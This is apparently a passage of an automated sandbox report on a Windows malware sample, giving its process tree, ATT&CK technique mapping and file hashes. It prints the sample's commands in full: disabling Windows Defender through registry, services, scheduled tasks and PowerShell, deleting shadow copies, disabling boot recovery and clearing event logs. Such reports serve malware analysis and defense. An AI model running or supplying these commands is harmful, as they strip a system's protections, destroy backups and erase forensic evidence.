memory of 2436 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 62 PID 2956 wrote to memory of 2624 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 64 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:2712
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2864
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2884
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2644
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2696
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1708
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2056
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2720
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:312
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:1152
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:1720
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:2436
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:2624
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:2100
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:1184
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:2076
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2656
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2888
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2904
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3044
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3024
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2516
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:856
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1900
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1496
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:380
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2236
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1904
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2432
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1988
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2216
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2168
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2292
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:344
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1472
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2212
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2468
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1188
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2132
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2328
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:984
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1796
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:1332
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:1376
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:1804
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:1520
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1324
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:1724
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1816
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:868
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2020
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2444
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2156
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2864
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2460
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Impair Defenses
3Disable or Modify Tools
1Indicator Removal
3Clear Windows Event Logs
1File Deletion
2Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50819f2d4d4023be7a970d21dc32f7f19
SHA153dc2551d2e0c22517bbc35b9150ce46fbb1cea6
SHA256740146275a2bff1af1df4bc6bd92c056642e34a602b97296de198b159b6d69f5
SHA512693234d6d44f15c55665ce167a8d272a3f1269de56bc9ce4c819f68ce3a75bf606bd1ef6bebd798399307715c4711baf195832ceafd7c365548eef2520831a90
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cc60e4eafc48cc08122b9f6cf049a46e
SHA19413faae37b0fe578f816f575e54662cfca1cf36
SHA256794d4484a1278bc83f63e8140abfd435b0e13017afea353047051d98ab508c08
SHA512c4dce96194523fb8fa92f9bb94c0db6a1e780e163543708db45b0b0bb6eba19415f31458282c8ea1963401e3bae922bd49883a614d1edf3f9ac464c8286282b5